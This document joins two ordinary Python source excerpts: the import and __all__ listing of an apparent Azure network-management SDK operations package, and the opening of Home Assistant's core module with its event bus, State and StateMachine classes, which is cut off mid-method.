from ._application_gateway_private_link_resources_operations import ApplicationGatewayPrivateLinkResourcesOperations
from ._application_gateway_private_endpoint_connections_operations import ApplicationGatewayPrivateEndpointConnectionsOperations
from ._application_security_groups_operations import ApplicationSecurityGroupsOperations
from ._available_delegations_operations import AvailableDelegationsOperations
from ._available_resource_group_delegations_operations import AvailableResourceGroupDelegationsOperations
from ._available_service_aliases_operations import AvailableServiceAliasesOperations
from ._azure_firewalls_operations import AzureFirewallsOperations
from ._azure_firewall_fqdn_tags_operations import AzureFirewallFqdnTagsOperations
from ._web_categories_operations import WebCategoriesOperations
from ._bastion_hosts_operations import BastionHostsOperations
from ._network_management_client_operations import NetworkManagementClientOperationsMixin
from ._custom_ip_prefixes_operations import CustomIPPrefixesOperations
from ._ddos_custom_policies_operations import DdosCustomPoliciesOperations
from ._ddos_protection_plans_operations import DdosProtectionPlansOperations
from ._dscp_configuration_operations import DscpConfigurationOperations
from ._available_endpoint_services_operations import AvailableEndpointServicesOperations
from ._express_route_circuit_authorizations_operations import ExpressRouteCircuitAuthorizationsOperations
from ._express_route_circuit_peerings_operations import ExpressRouteCircuitPeeringsOperations
from ._express_route_circuit_connections_operations import ExpressRouteCircuitConnectionsOperations
from ._peer_express_route_circuit_connections_operations import PeerExpressRouteCircuitConnectionsOperations
from ._express_route_circuits_operations import ExpressRouteCircuitsOperations
from ._express_route_service_providers_operations import ExpressRouteServiceProvidersOperations
from ._express_route_cross_connections_operations import ExpressRouteCrossConnectionsOperations
from ._express_route_cross_connection_peerings_operations import ExpressRouteCrossConnectionPeeringsOperations
from ._express_route_ports_locations_operations import ExpressRoutePortsLocationsOperations
from ._express_route_ports_operations import ExpressRoutePortsOperations
from ._express_route_links_operations import ExpressRouteLinksOperations
from ._firewall_policies_operations import FirewallPoliciesOperations
from ._firewall_policy_rule_collection_groups_operations import FirewallPolicyRuleCollectionGroupsOperations
from ._ip_allocations_operations import IpAllocationsOperations
from ._ip_groups_operations import IpGroupsOperations
from ._load_balancers_operations import LoadBalancersOperations
from ._load_balancer_backend_address_pools_operations import LoadBalancerBackendAddressPoolsOperations
from ._load_balancer_frontend_ip_configurations_operations import LoadBalancerFrontendIPConfigurationsOperations
from ._inbound_nat_rules_operations import InboundNatRulesOperations
from ._load_balancer_load_balancing_rules_operations import LoadBalancerLoadBalancingRulesOperations
from ._load_balancer_outbound_rules_operations import LoadBalancerOutboundRulesOperations
from ._load_balancer_network_interfaces_operations import LoadBalancerNetworkInterfacesOperations
from ._load_balancer_probes_operations import LoadBalancerProbesOperations
from ._nat_gateways_operations import NatGatewaysOperations
from ._network_interfaces_operations import NetworkInterfacesOperations
from ._network_interface_ip_configurations_operations import NetworkInterfaceIPConfigurationsOperations
from ._network_interface_load_balancers_operations import NetworkInterfaceLoadBalancersOperations
from ._network_interface_tap_configurations_operations import NetworkInterfaceTapConfigurationsOperations
from ._network_profiles_operations import NetworkProfilesOperations
from ._network_security_groups_operations import NetworkSecurityGroupsOperations
from ._security_rules_operations import SecurityRulesOperations
from ._default_security_rules_operations import DefaultSecurityRulesOperations
from ._network_virtual_appliances_operations import NetworkVirtualAppliancesOperations
from ._virtual_appliance_sites_operations import VirtualApplianceSitesOperations
from ._virtual_appliance_skus_operations import VirtualApplianceSkusOperations
from ._inbound_security_rule_operations import InboundSecurityRuleOperations
from ._network_watchers_operations import NetworkWatchersOperations
from ._packet_captures_operations import PacketCapturesOperations
from ._connection_monitors_operations import ConnectionMonitorsOperations
from ._flow_logs_operations import FlowLogsOperations
from ._operations import Operations
from ._private_endpoints_operations import PrivateEndpointsOperations
from ._available_private_endpoint_types_operations import AvailablePrivateEndpointTypesOperations
from ._private_dns_zone_groups_operations import PrivateDnsZoneGroupsOperations
from ._private_link_services_operations import PrivateLinkServicesOperations
from ._public_ip_addresses_operations import PublicIPAddressesOperations
from ._public_ip_prefixes_operations import PublicIPPrefixesOperations
from ._route_filters_operations import RouteFiltersOperations
from ._route_filter_rules_operations import RouteFilterRulesOperations
from ._route_tables_operations import RouteTablesOperations
from ._routes_operations import RoutesOperations
from ._security_partner_providers_operations import SecurityPartnerProvidersOperations
from ._bgp_service_communities_operations import BgpServiceCommunitiesOperations
from ._service_endpoint_policies_operations import ServiceEndpointPoliciesOperations
from ._service_endpoint_policy_definitions_operations import ServiceEndpointPolicyDefinitionsOperations
from ._service_tags_operations import ServiceTagsOperations
from ._usages_operations import UsagesOperations
from ._virtual_networks_operations import VirtualNetworksOperations
from ._subnets_operations import SubnetsOperations
from ._resource_navigation_links_operations import ResourceNavigationLinksOperations
from ._service_association_links_operations import ServiceAssociationLinksOperations
from ._virtual_network_peerings_operations import VirtualNetworkPeeringsOperations
from ._virtual_network_gateways_operations import VirtualNetworkGatewaysOperations
from ._virtual_network_gateway_connections_operations import VirtualNetworkGatewayConnectionsOperations
from ._local_network_gateways_operations import LocalNetworkGatewaysOperations
from ._virtual_network_taps_operations import VirtualNetworkTapsOperations
from ._virtual_routers_operations import VirtualRoutersOperations
from ._virtual_router_peerings_operations import VirtualRouterPeeringsOperations
from ._virtual_wans_operations import VirtualWansOperations
from ._vpn_sites_operations import VpnSitesOperations
from ._vpn_site_links_operations import VpnSiteLinksOperations
from ._vpn_sites_configuration_operations import VpnSitesConfigurationOperations
from ._vpn_server_configurations_operations import VpnServerConfigurationsOperations
from ._virtual_hubs_operations import VirtualHubsOperations
from ._hub_virtual_network_connections_operations import HubVirtualNetworkConnectionsOperations
from ._vpn_gateways_operations import VpnGatewaysOperations
from ._vpn_connections_operations import VpnConnectionsOperations
from ._vpn_site_link_connections_operations import VpnSiteLinkConnectionsOperations
from ._vpn_link_connections_operations import VpnLinkConnectionsOperations
from ._nat_rules_operations import NatRulesOperations
from ._p2_svpn_gateways_operations import P2SVpnGatewaysOperations
from ._vpn_server_configurations_associated_with_virtual_wan_operations import VpnServerConfigurationsAssociatedWithVirtualWanOperations
from ._virtual_hub_route_table_v2_s_operations import VirtualHubRouteTableV2SOperations
from ._express_route_gateways_operations import ExpressRouteGatewaysOperations
from ._express_route_connections_operations import ExpressRouteConnectionsOperations
from ._virtual_hub_bgp_connection_operations import VirtualHubBgpConnectionOperations
from ._virtual_hub_bgp_connections_operations import VirtualHubBgpConnectionsOperations
from ._virtual_hub_ip_configuration_operations import VirtualHubIpConfigurationOperations
from ._hub_route_tables_operations import HubRouteTablesOperations
from ._web_application_firewall_policies_operations import WebApplicationFirewallPoliciesOperations
__all__ = [
'ApplicationGatewaysOperations',
'ApplicationGatewayPrivateLinkResourcesOperations',
'ApplicationGatewayPrivateEndpointConnectionsOperations',
'ApplicationSecurityGroupsOperations',
'AvailableDelegationsOperations',
'AvailableResourceGroupDelegationsOperations',
'AvailableServiceAliasesOperations',
'AzureFirewallsOperations',
'AzureFirewallFqdnTagsOperations',
'WebCategoriesOperations',
'BastionHostsOperations',
'NetworkManagementClientOperationsMixin',
'CustomIPPrefixesOperations',
'DdosCustomPoliciesOperations',
'DdosProtectionPlansOperations',
'DscpConfigurationOperations',
'AvailableEndpointServicesOperations',
'ExpressRouteCircuitAuthorizationsOperations',
'ExpressRouteCircuitPeeringsOperations',
'ExpressRouteCircuitConnectionsOperations',
'PeerExpressRouteCircuitConnectionsOperations',
'ExpressRouteCircuitsOperations',
'ExpressRouteServiceProvidersOperations',
'ExpressRouteCrossConnectionsOperations',
'ExpressRouteCrossConnectionPeeringsOperations',
'ExpressRoutePortsLocationsOperations',
'ExpressRoutePortsOperations',
'ExpressRouteLinksOperations',
'FirewallPoliciesOperations',
'FirewallPolicyRuleCollectionGroupsOperations',
'IpAllocationsOperations',
'IpGroupsOperations',
'LoadBalancersOperations',
'LoadBalancerBackendAddressPoolsOperations',
'LoadBalancerFrontendIPConfigurationsOperations',
'InboundNatRulesOperations',
'LoadBalancerLoadBalancingRulesOperations',
'LoadBalancerOutboundRulesOperations',
'LoadBalancerNetworkInterfacesOperations',
'LoadBalancerProbesOperations',
'NatGatewaysOperations',
'NetworkInterfacesOperations',
'NetworkInterfaceIPConfigurationsOperations',
'NetworkInterfaceLoadBalancersOperations',
'NetworkInterfaceTapConfigurationsOperations',
'NetworkProfilesOperations',
'NetworkSecurityGroupsOperations',
'SecurityRulesOperations',
'DefaultSecurityRulesOperations',
'NetworkVirtualAppliancesOperations',
'VirtualApplianceSitesOperations',
'VirtualApplianceSkusOperations',
'InboundSecurityRuleOperations',
'NetworkWatchersOperations',
'PacketCapturesOperations',
'ConnectionMonitorsOperations',
'FlowLogsOperations',
'Operations',
'PrivateEndpointsOperations',
'AvailablePrivateEndpointTypesOperations',
'PrivateDnsZoneGroupsOperations',
'PrivateLinkServicesOperations',
'PublicIPAddressesOperations',
'PublicIPPrefixesOperations',
'RouteFiltersOperations',
'RouteFilterRulesOperations',
'RouteTablesOperations',
'RoutesOperations',
'SecurityPartnerProvidersOperations',
'BgpServiceCommunitiesOperations',
'ServiceEndpointPoliciesOperations',
'ServiceEndpointPolicyDefinitionsOperations',
'ServiceTagsOperations',
'UsagesOperations',
'VirtualNetworksOperations',
'SubnetsOperations',
'ResourceNavigationLinksOperations',
'ServiceAssociationLinksOperations',
'VirtualNetworkPeeringsOperations',
'VirtualNetworkGatewaysOperations',
'VirtualNetworkGatewayConnectionsOperations',
'LocalNetworkGatewaysOperations',
'VirtualNetworkTapsOperations',
'VirtualRoutersOperations',
'VirtualRouterPeeringsOperations',
'VirtualWansOperations',
'VpnSitesOperations',
'VpnSiteLinksOperations',
'VpnSitesConfigurationOperations',
'VpnServerConfigurationsOperations',
'VirtualHubsOperations',
'HubVirtualNetworkConnectionsOperations',
'VpnGatewaysOperations',
'VpnConnectionsOperations',
'VpnSiteLinkConnectionsOperations',
'VpnLinkConnectionsOperations',
'NatRulesOperations',
'P2SVpnGatewaysOperations',
'VpnServerConfigurationsAssociatedWithVirtualWanOperations',
'VirtualHubRouteTableV2SOperations',
'ExpressRouteGatewaysOperations',
'ExpressRouteConnectionsOperations',
'VirtualHubBgpConnectionOperations',
'VirtualHubBgpConnectionsOperations',
'VirtualHubIpConfigurationOperations',
'HubRouteTablesOperations',
'WebApplicationFirewallPoliciesOperations',
]
| |
"""
Core components of Home Assistant.
Home Assistant is a Home Automation framework for observing the state
of entities and react to changes.
"""
import asyncio
from concurrent.futures import ThreadPoolExecutor
import datetime
import enum
import functools
import logging
import os
import pathlib
import threading
from time import monotonic
from types import MappingProxyType
from typing import (
TYPE_CHECKING,
Any,
Awaitable,
Callable,
Coroutine,
Dict,
List,
Mapping,
Optional,
Set,
TypeVar,
)
import uuid
from async_timeout import timeout
import attr
import voluptuous as vol
from homeassistant import loader, util
from homeassistant.const import (
ATTR_DOMAIN,
ATTR_FRIENDLY_NAME,
ATTR_NOW,
ATTR_SECONDS,
ATTR_SERVICE,
ATTR_SERVICE_DATA,
CONF_UNIT_SYSTEM_IMPERIAL,
EVENT_CALL_SERVICE,
EVENT_CORE_CONFIG_UPDATE,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_HOMEASSISTANT_START,
EVENT_HOMEASSISTANT_STOP,
EVENT_SERVICE_REGISTERED,
EVENT_SERVICE_REMOVED,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
EVENT_TIMER_OUT_OF_SYNC,
MATCH_ALL,
__version__,
)
from homeassistant.exceptions import (
HomeAssistantError,
InvalidEntityFormatError,
InvalidStateError,
ServiceNotFound,
Unauthorized,
)
from homeassistant.util import location, slugify
from homeassistant.util.async_ import fire_coroutine_threadsafe, run_callback_threadsafe
import homeassistant.util.dt as dt_util
from homeassistant.util.unit_system import IMPERIAL_SYSTEM, METRIC_SYSTEM, UnitSystem
# Typing imports that create a circular dependency
if TYPE_CHECKING:
from homeassistant.config_entries import ConfigEntries
from homeassistant.components.http import HomeAssistantHTTP
# pylint: disable=invalid-name
T = TypeVar("T")
CALLABLE_T = TypeVar("CALLABLE_T", bound=Callable)
CALLBACK_TYPE = Callable[[], None]
# pylint: enable=invalid-name
CORE_STORAGE_KEY = "core.config"
CORE_STORAGE_VERSION = 1
DOMAIN = "homeassistant"
# How long we wait for the result of a service call
SERVICE_CALL_LIMIT = 10 # seconds
# Source of core configuration
SOURCE_DISCOVERED = "discovered"
SOURCE_STORAGE = "storage"
SOURCE_YAML = "yaml"
# How long to wait till things that run on startup have to finish.
TIMEOUT_EVENT_START = 15
_LOGGER = logging.getLogger(__name__)
def split_entity_id(entity_id: str) -> List[str]:
"""Split a state entity_id into domain, object_id."""
return entity_id.split(".", 1)
def valid_entity_id(entity_id: str) -> bool:
"""Test if an entity ID is a valid format.
Format: <domain>.<entity> where both are slugs.
"""
return "." in entity_id and slugify(entity_id) == entity_id.replace(".", "_", 1)
def valid_state(state: str) -> bool:
"""Test if a state is valid."""
return len(state) < 256
def callback(func: CALLABLE_T) -> CALLABLE_T:
"""Annotation to mark method as safe to call from within the event loop."""
setattr(func, "_hass_callback", True)
return func
def is_callback(func: Callable[..., Any]) -> bool:
"""Check if function is safe to be called in the event loop."""
return getattr(func, "_hass_callback", False) is True
@callback
def async_loop_exception_handler(_: Any, context: Dict) -> None:
"""Handle all exception inside the core loop."""
kwargs = {}
exception = context.get("exception")
if exception:
kwargs["exc_info"] = (type(exception), exception, exception.__traceback__)
_LOGGER.error(
"Error doing job: %s", context["message"], **kwargs # type: ignore
)
class CoreState(enum.Enum):
"""Represent the current state of Home Assistant."""
not_running = "NOT_RUNNING"
starting = "STARTING"
running = "RUNNING"
stopping = "STOPPING"
def __str__(self) -> str:
"""Return the event."""
return self.value # type: ignore
class HomeAssistant:
"""Root object of the Home Assistant home automation."""
http: "HomeAssistantHTTP" = None # type: ignore
config_entries: "ConfigEntries" = None # type: ignore
def __init__(self, loop: Optional[asyncio.events.AbstractEventLoop] = None) -> None:
"""Initialize new Home Assistant object."""
self.loop: asyncio.events.AbstractEventLoop = (loop or asyncio.get_event_loop())
executor_opts: Dict[str, Any] = {
"max_workers": None,
"thread_name_prefix": "SyncWorker",
}
self.executor = ThreadPoolExecutor(**executor_opts)
self.loop.set_default_executor(self.executor)
self.loop.set_exception_handler(async_loop_exception_handler)
self._pending_tasks: list = []
self._track_task = True
self.bus = EventBus(self)
self.services = ServiceRegistry(self)
self.states = StateMachine(self.bus, self.loop)
self.config = Config(self)
self.components = loader.Components(self)
self.helpers = loader.Helpers(self)
# This is a dictionary that any component can store any data on.
self.data: dict = {}
self.state = CoreState.not_running
self.exit_code = 0
# If not None, use to signal end-of-loop
self._stopped: Optional[asyncio.Event] = None
@property
def is_running(self) -> bool:
"""Return if Home Assistant is running."""
return self.state in (CoreState.starting, CoreState.running)
def start(self) -> int:
"""Start Home Assistant.
Note: This function is only used for testing.
For regular use, use "await hass.run()".
"""
# Register the async start
fire_coroutine_threadsafe(self.async_start(), self.loop)
# Run forever
try:
# Block until stopped
_LOGGER.info("Starting Home Assistant core loop")
self.loop.run_forever()
finally:
self.loop.close()
return self.exit_code
async def async_run(self, *, attach_signals: bool = True) -> int:
"""Home Assistant main entry point.
Start Home Assistant and block until stopped.
This method is a coroutine.
"""
if self.state != CoreState.not_running:
raise RuntimeError("Home Assistant is already running")
# _async_stop will set this instead of stopping the loop
self._stopped = asyncio.Event()
await self.async_start()
if attach_signals:
from homeassistant.helpers.signal import async_register_signal_handling
async_register_signal_handling(self)
await self._stopped.wait()
return self.exit_code
async def async_start(self) -> None:
"""Finalize startup from inside the event loop.
This method is a coroutine.
"""
_LOGGER.info("Starting Home Assistant")
self.state = CoreState.starting
setattr(self.loop, "_thread_ident", threading.get_ident())
self.bus.async_fire(EVENT_HOMEASSISTANT_START)
try:
# Only block for EVENT_HOMEASSISTANT_START listener
self.async_stop_track_tasks()
with timeout(TIMEOUT_EVENT_START):
await self.async_block_till_done()
except asyncio.TimeoutError:
_LOGGER.warning(
"Something is blocking Home Assistant from wrapping up the "
"start up phase. We're going to continue anyway. Please "
"report the following info at http://bit.ly/2ogP58T : %s",
", ".join(self.config.components),
)
# Allow automations to set up the start triggers before changing state
await asyncio.sleep(0)
if self.state != CoreState.starting:
_LOGGER.warning(
"Home Assistant startup has been interrupted. "
"Its state may be inconsistent."
)
return
self.state = CoreState.running
_async_create_timer(self)
def add_job(self, target: Callable[..., Any], *args: Any) -> None:
"""Add job to the executor pool.
target: target to call.
args: parameters for method to call.
"""
if target is None:
raise ValueError("Don't call add_job with None")
self.loop.call_soon_threadsafe(self.async_add_job, target, *args)
@callback
def async_add_job(
self, target: Callable[..., Any], *args: Any
) -> Optional[asyncio.Future]:
"""Add a job from within the event loop.
This method must be run in the event loop.
target: target to call.
args: parameters for method to call.
"""
task = None
# Check for partials to properly determine if coroutine function
check_target = target
while isinstance(check_target, functools.partial):
check_target = check_target.func
if asyncio.iscoroutine(check_target):
task = self.loop.create_task(target) # type: ignore
elif is_callback(check_target):
self.loop.call_soon(target, *args)
elif asyncio.iscoroutinefunction(check_target):
task = self.loop.create_task(target(*args))
else:
task = self.loop.run_in_executor( # type: ignore
None, target, *args
)
# If a task is scheduled
if self._track_task and task is not None:
self._pending_tasks.append(task)
return task
@callback
def async_create_task(self, target: Coroutine) -> asyncio.tasks.Task:
"""Create a task from within the eventloop.
This method must be run in the event loop.
target: target to call.
"""
task: asyncio.tasks.Task = self.loop.create_task(target)
if self._track_task:
self._pending_tasks.append(task)
return task
@callback
def async_add_executor_job(
self, target: Callable[..., T], *args: Any
) -> Awaitable[T]:
"""Add an executor job from within the event loop."""
task = self.loop.run_in_executor(None, target, *args)
# If a task is scheduled
if self._track_task:
self._pending_tasks.append(task)
return task
@callback
def async_track_tasks(self) -> None:
"""Track tasks so you can wait for all tasks to be done."""
self._track_task = True
@callback
def async_stop_track_tasks(self) -> None:
"""Stop track tasks so you can't wait for all tasks to be done."""
self._track_task = False
@callback
def async_run_job(self, target: Callable[..., None], *args: Any) -> None:
"""Run a job from within the event loop.
This method must be run in the event loop.
target: target to call.
args: parameters for method to call.
"""
if not asyncio.iscoroutine(target) and is_callback(target):
target(*args)
else:
self.async_add_job(target, *args)
def block_till_done(self) -> None:
"""Block till all pending work is done."""
asyncio.run_coroutine_threadsafe(
self.async_block_till_done(), self.loop
).result()
async def async_block_till_done(self) -> None:
"""Block till all pending work is done."""
# To flush out any call_soon_threadsafe
await asyncio.sleep(0)
while self._pending_tasks:
pending = [task for task in self._pending_tasks if not task.done()]
self._pending_tasks.clear()
if pending:
await asyncio.wait(pending)
else:
await asyncio.sleep(0)
def stop(self) -> None:
"""Stop Home Assistant and shuts down all threads."""
if self.state == CoreState.not_running: # just ignore
return
fire_coroutine_threadsafe(self.async_stop(), self.loop)
async def async_stop(self, exit_code: int = 0, *, force: bool = False) -> None:
"""Stop Home Assistant and shuts down all threads.
The "force" flag commands async_stop to proceed regardless of
Home Assistan't current state. You should not set this flag
unless you're testing.
This method is a coroutine.
"""
if not force:
# Some tests require async_stop to run,
# regardless of the state of the loop.
if self.state == CoreState.not_running: # just ignore
return
if self.state == CoreState.stopping:
_LOGGER.info("async_stop called twice: ignored")
return
if self.state == CoreState.starting:
# This may not work
_LOGGER.warning("async_stop called before startup is complete")
# stage 1
self.state = CoreState.stopping
self.async_track_tasks()
self.bus.async_fire(EVENT_HOMEASSISTANT_STOP)
await self.async_block_till_done()
# stage 2
self.state = CoreState.not_running
self.bus.async_fire(EVENT_HOMEASSISTANT_CLOSE)
await self.async_block_till_done()
self.executor.shutdown()
self.exit_code = exit_code
if self._stopped is not None:
self._stopped.set()
else:
self.loop.stop()
@attr.s(slots=True, frozen=True)
class Context:
"""The context that triggered something."""
user_id = attr.ib(type=str, default=None)
parent_id = attr.ib(type=Optional[str], default=None)
id = attr.ib(type=str, default=attr.Factory(lambda: uuid.uuid4().hex))
def as_dict(self) -> dict:
"""Return a dictionary representation of the context."""
return {"id": self.id, "parent_id": self.parent_id, "user_id": self.user_id}
class EventOrigin(enum.Enum):
"""Represent the origin of an event."""
local = "LOCAL"
remote = "REMOTE"
def __str__(self) -> str:
"""Return the event."""
return self.value # type: ignore
class Event:
"""Representation of an event within the bus."""
__slots__ = ["event_type", "data", "origin", "time_fired", "context"]
def __init__(
self,
event_type: str,
data: Optional[Dict] = None,
origin: EventOrigin = EventOrigin.local,
time_fired: Optional[int] = None,
context: Optional[Context] = None,
) -> None:
"""Initialize a new event."""
self.event_type = event_type
self.data = data or {}
self.origin = origin
self.time_fired = time_fired or dt_util.utcnow()
self.context: Context = context or Context()
def as_dict(self) -> Dict:
"""Create a dict representation of this Event.
Async friendly.
"""
return {
"event_type": self.event_type,
"data": dict(self.data),
"origin": str(self.origin),
"time_fired": self.time_fired,
"context": self.context.as_dict(),
}
def __repr__(self) -> str:
"""Return the representation."""
# pylint: disable=maybe-no-member
if self.data:
return "<Event {}[{}]: {}>".format(
self.event_type, str(self.origin)[0], util.repr_helper(self.data)
)
return "<Event {}[{}]>".format(self.event_type, str(self.origin)[0])
def __eq__(self, other: Any) -> bool:
"""Return the comparison."""
return ( # type: ignore
self.__class__ == other.__class__
and self.event_type == other.event_type
and self.data == other.data
and self.origin == other.origin
and self.time_fired == other.time_fired
and self.context == other.context
)
class EventBus:
"""Allow the firing of and listening for events."""
def __init__(self, hass: HomeAssistant) -> None:
"""Initialize a new event bus."""
self._listeners: Dict[str, List[Callable]] = {}
self._hass = hass
@callback
def async_listeners(self) -> Dict[str, int]:
"""Return dictionary with events and the number of listeners.
This method must be run in the event loop.
"""
return {key: len(self._listeners[key]) for key in self._listeners}
@property
def listeners(self) -> Dict[str, int]:
"""Return dictionary with events and the number of listeners."""
return run_callback_threadsafe( # type: ignore
self._hass.loop, self.async_listeners
).result()
def fire(
self,
event_type: str,
event_data: Optional[Dict] = None,
origin: EventOrigin = EventOrigin.local,
context: Optional[Context] = None,
) -> None:
"""Fire an event."""
self._hass.loop.call_soon_threadsafe(
self.async_fire, event_type, event_data, origin, context
)
@callback
def async_fire(
self,
event_type: str,
event_data: Optional[Dict] = None,
origin: EventOrigin = EventOrigin.local,
context: Optional[Context] = None,
) -> None:
"""Fire an event.
This method must be run in the event loop.
"""
listeners = self._listeners.get(event_type, [])
# EVENT_HOMEASSISTANT_CLOSE should go only to his listeners
match_all_listeners = self._listeners.get(MATCH_ALL)
if match_all_listeners is not None and event_type != EVENT_HOMEASSISTANT_CLOSE:
listeners = match_all_listeners + listeners
event = Event(event_type, event_data, origin, None, context)
if event_type != EVENT_TIME_CHANGED:
_LOGGER.debug("Bus:Handling %s", event)
if not listeners:
return
for func in listeners:
self._hass.async_add_job(func, event)
def listen(self, event_type: str, listener: Callable) -> CALLBACK_TYPE:
"""Listen for all events or events of a specific type.
To listen to all events specify the constant ``MATCH_ALL``
as event_type.
"""
async_remove_listener = run_callback_threadsafe(
self._hass.loop, self.async_listen, event_type, listener
).result()
def remove_listener() -> None:
"""Remove the listener."""
run_callback_threadsafe(self._hass.loop, async_remove_listener).result()
return remove_listener
@callback
def async_listen(self, event_type: str, listener: Callable) -> CALLBACK_TYPE:
"""Listen for all events or events of a specific type.
To listen to all events specify the constant ``MATCH_ALL``
as event_type.
This method must be run in the event loop.
"""
if event_type in self._listeners:
self._listeners[event_type].append(listener)
else:
self._listeners[event_type] = [listener]
def remove_listener() -> None:
"""Remove the listener."""
self._async_remove_listener(event_type, listener)
return remove_listener
def listen_once(self, event_type: str, listener: Callable) -> CALLBACK_TYPE:
"""Listen once for event of a specific type.
To listen to all events specify the constant ``MATCH_ALL``
as event_type.
Returns function to unsubscribe the listener.
"""
async_remove_listener = run_callback_threadsafe(
self._hass.loop, self.async_listen_once, event_type, listener
).result()
def remove_listener() -> None:
"""Remove the listener."""
run_callback_threadsafe(self._hass.loop, async_remove_listener).result()
return remove_listener
@callback
def async_listen_once(self, event_type: str, listener: Callable) -> CALLBACK_TYPE:
"""Listen once for event of a specific type.
To listen to all events specify the constant ``MATCH_ALL``
as event_type.
Returns registered listener that can be used with remove_listener.
This method must be run in the event loop.
"""
@callback
def onetime_listener(event: Event) -> None:
"""Remove listener from event bus and then fire listener."""
if hasattr(onetime_listener, "run"):
return
# Set variable so that we will never run twice.
# Because the event bus loop might have async_fire queued multiple
# times, its possible this listener may already be lined up
# multiple times as well.
# This will make sure the second time it does nothing.
setattr(onetime_listener, "run", True)
self._async_remove_listener(event_type, onetime_listener)
self._hass.async_run_job(listener, event)
return self.async_listen(event_type, onetime_listener)
@callback
def _async_remove_listener(self, event_type: str, listener: Callable) -> None:
"""Remove a listener of a specific event_type.
This method must be run in the event loop.
"""
try:
self._listeners[event_type].remove(listener)
# delete event_type list if empty
if not self._listeners[event_type]:
self._listeners.pop(event_type)
except (KeyError, ValueError):
# KeyError is key event_type listener did not exist
# ValueError if listener did not exist within event_type
_LOGGER.warning("Unable to remove unknown listener %s", listener)
class State:
"""Object to represent a state within the state machine.
entity_id: the entity that is represented.
state: the state of the entity
attributes: extra information on entity and state
last_changed: last time the state was changed, not the attributes.
last_updated: last time this object was updated.
context: Context in which it was created
"""
__slots__ = [
"entity_id",
"state",
"attributes",
"last_changed",
"last_updated",
"context",
]
def __init__(
self,
entity_id: str,
state: str,
attributes: Optional[Mapping] = None,
last_changed: Optional[datetime.datetime] = None,
last_updated: Optional[datetime.datetime] = None,
context: Optional[Context] = None,
# Temp, because database can still store invalid entity IDs
# Remove with 1.0 or in 2020.
temp_invalid_id_bypass: Optional[bool] = False,
) -> None:
"""Initialize a new state."""
state = str(state)
if not valid_entity_id(entity_id) and not temp_invalid_id_bypass:
raise InvalidEntityFormatError(
f"Invalid entity id encountered: {entity_id}. "
"Format should be <domain>.<object_id>"
)
if not valid_state(state):
raise InvalidStateError(
f"Invalid state encountered for entity id: {entity_id}. "
"State max length is 255 characters."
)
self.entity_id = entity_id.lower()
self.state = state
self.attributes = MappingProxyType(attributes or {})
self.last_updated = last_updated or dt_util.utcnow()
self.last_changed = last_changed or self.last_updated
self.context = context or Context()
@property
def domain(self) -> str:
"""Domain of this state."""
return split_entity_id(self.entity_id)[0]
@property
def object_id(self) -> str:
"""Object id of this state."""
return split_entity_id(self.entity_id)[1]
@property
def name(self) -> str:
"""Name of this state."""
return self.attributes.get(ATTR_FRIENDLY_NAME) or self.object_id.replace(
"_", " "
)
def as_dict(self) -> Dict:
"""Return a dict representation of the State.
Async friendly.
To be used for JSON serialization.
Ensures: state == State.from_dict(state.as_dict())
"""
return {
"entity_id": self.entity_id,
"state": self.state,
"attributes": dict(self.attributes),
"last_changed": self.last_changed,
"last_updated": self.last_updated,
"context": self.context.as_dict(),
}
@classmethod
def from_dict(cls, json_dict: Dict) -> Any:
"""Initialize a state from a dict.
Async friendly.
Ensures: state == State.from_json_dict(state.to_json_dict())
"""
if not (json_dict and "entity_id" in json_dict and "state" in json_dict):
return None
last_changed = json_dict.get("last_changed")
if isinstance(last_changed, str):
last_changed = dt_util.parse_datetime(last_changed)
last_updated = json_dict.get("last_updated")
if isinstance(last_updated, str):
last_updated = dt_util.parse_datetime(last_updated)
context = json_dict.get("context")
if context:
context = Context(id=context.get("id"), user_id=context.get("user_id"))
return cls(
json_dict["entity_id"],
json_dict["state"],
json_dict.get("attributes"),
last_changed,
last_updated,
context,
)
def __eq__(self, other: Any) -> bool:
"""Return the comparison of the state."""
return ( # type: ignore
self.__class__ == other.__class__
and self.entity_id == other.entity_id
and self.state == other.state
and self.attributes == other.attributes
and self.context == other.context
)
def __repr__(self) -> str:
"""Return the representation of the states."""
attrs = (
"; {}".format(util.repr_helper(self.attributes)) if self.attributes else ""
)
return "<state {}={}{} @ {}>".format(
self.entity_id,
self.state,
attrs,
dt_util.as_local(self.last_changed).isoformat(),
)
class StateMachine:
"""Helper class that tracks the state of different entities."""
def __init__(self, bus: EventBus, loop: asyncio.events.AbstractEventLoop) -> None:
"""Initialize state machine."""
self._states: Dict[str, State] = {}
self._bus = bus
self._loop = loop
def entity_ids(self, domain_filter: Optional[str] = None) -> List[str]:
"""List of entity ids that are being tracked."""
future = run_callback_threadsafe(
self._loop, self.async_entity_ids, domain_filter
)
return future.result() # type: ignore
@callback
def async_entity_ids(self, domain_filter: Optional[str] = None) -> List[str]:
"""List of entity ids that are being tracked.
This method must be run in the event loop.
"""
if domain_filter is None:
return list(self._states.keys())
domain_filter = domain_filter.lower()
return [
state.entity_id
for state in self._states.values()
if state.domain == domain_filter
]
def all(self) -> List[State]:
"""Create a list of all states."""
return run_callback_threadsafe( # type: ignore
self._loop, self.async_all
).result()
@callback
def async_all(self) -> List[State]:
"""Create a list of all states.
This method must be run in the event loop.
"""
return list(self._states.values())
def get(self, entity_id: str) -> Optional[State]:
"""Retrieve state of entity_id or None if not found.
Async friendly.
"""
return self._states.get(entity_id.lower())
def is_state(self, entity_id: str, state: str) -> bool:
"""Test if entity exists and is in specified state.
Async friendly.
"""
state_obj = self.get(entity_id)
return state_obj is not None and state_obj.state == state
def remove(self, entity_id: str) -> bool:
"""Remove the state of an entity.
Returns boolean to indicate if an entity was removed.
"""
return run_callback_threadsafe( # type: ignore
self._loop, self.async_remove, entity_id
).result()
@callback
def async_remove(self, entity_id: str) -> bool:
"""Remove the state of an entity.
Returns boolean to indicate if an entity was removed.
This method must be run in the event loop.
"""
entity_id = entity_id.lower()
old_state = self._states.pop(entity_id, None)
if old_state is None:
return False
self._bus.async_fire(
EVENT_STATE_CHANGED,
{"entity_id": entity_id, "old_state": old_state, "new_state": None},
)
return True
def set(
self,
entity_id: str,
new_state: str,
attributes: Optional[Dict] = None,
force_update: bool = False,
context: Optional[Context] = None,
) -> None:
"""Set the state of an entity, add entity if it does not exist.
Attributes is an optional dict to specify attributes of this state.
If you just update the attributes and not the state, last changed will
not be affected.
"""
run_callback_threadsafe(
self._loop,
self.async_set,
entity_id,
new_state,
attributes,
force_update,
context,
).result()
@callback
def async_set(
